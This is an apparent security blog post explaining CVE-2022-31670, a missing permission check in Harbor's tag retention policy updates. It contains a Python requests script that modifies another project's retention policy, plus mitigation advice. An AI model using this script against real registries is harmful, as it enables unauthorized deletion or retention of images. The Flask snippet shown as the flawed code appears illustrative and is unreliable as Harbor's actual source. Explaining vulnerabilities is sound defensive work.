In a recently discovered vulnerability, harbor, a popular container image registry, fails to validate user permissions when updating tag retention policies, which could allow unauthorized users to modify tag retention policies in other projects. In this post, I will guide you through the details of this vulnerability (CVE-2022-31670), how to exploit it, and what steps you can take to mitigate this issue.
Exploit Details
Due to an oversight in the permission validation process, Harbor does not check if the current user has the necessary access to a project when updating its tag retention policy. This means that if an attacker knows the ID of a project that they do not have access to, they can send a request to modify the tag retention policy of that project, potentially causing important container images to be deleted, or allowing outdated and vulnerable images to persist.
Below is a code snippet highlighting the issue
@app.route('/projects/<project_id>/retention', methods=['PUT'])
def update_retention_policy(project_id):
"""
Update the tag retention policy for the specified project.
"""
policy = request.json
# The following line should check if the user has permission to modify the project.
# However, it is missing, leading to the vulnerability.
# check_permission(project_id, current_user)
update_policy_in_database(project_id, policy)
return jsonify({'status': 'success'})
In the code snippet above, we can see that the check_permission() function is missing, which should confirm if the current user has the necessary permission to modify the project's tag retention policy.
Exploiting the Vulnerability
For an attacker to exploit this issue, they need to have a valid user account on the Harbor instance, know the ID of a project they don't have access to, and send a PUT request to the /projects/<project_id>/retention API endpoint with the desired changes to the tag retention policy.
Here's a simple example of how an attacker could exploit this vulnerability using the requests library in Python:
import requests
harbor_url = 'https://harbor.example.org';
username = 'attacker'
password = 'attackers_password'
project_id = 'target_project_id'
new_policy = { ... } # new tag retention policy data
session = requests.Session()
session.auth = (username, password)
response = session.put(f'{harbor_url}/projects/{project_id}/retention', json=new_policy)
if response.status_code == 200:
print('Successfully updated the tag retention policy')
else:
print('Failed to update the tag retention policy')
The attacker would replace harbor_url, username, password, project_id, and new_policy with the appropriate values for the target Harbor instance.
References and Sources
The original advisory for CVE-2022-31670, along with the explanation of the vulnerability and potential impact, can be found here:
- CVE-2022-31670 - National Vulnerability Database (NVD)
- Original Advisory for CVE-2022-31670 - security_tracker
Mitigation Steps
To mitigate this vulnerability, it is crucial to apply the patch provided by the Harbor developers. The fixed version of Harbor properly checks user permissions before allowing tag retention policy updates.
- Harbor Release containing the fix
In addition, you should follow best practices for securing your Harbor instance, such as enabling and configuring role-based access control (RBAC), keeping Harbor up-to-date, and monitoring access logs for any suspicious activity.
Conclusion
In this post, we explored the CVE-2022-31670 vulnerability in Harbor, which allows unauthorized updates of tag retention policies due to the absence of proper permission validation. We covered the exploit details, provided code snippets to understand the problem, and demonstrated how an attacker might exploit this issue. Finally, we suggested mitigation steps to prevent unauthorized access to your Harbor projects' tag retention policies. Stay safe by keeping your software up-to-date!
Timeline
Published on: 11/14/2024 12:15:17 UTC
Last modified on: 11/15/2024 13:58:08 UTC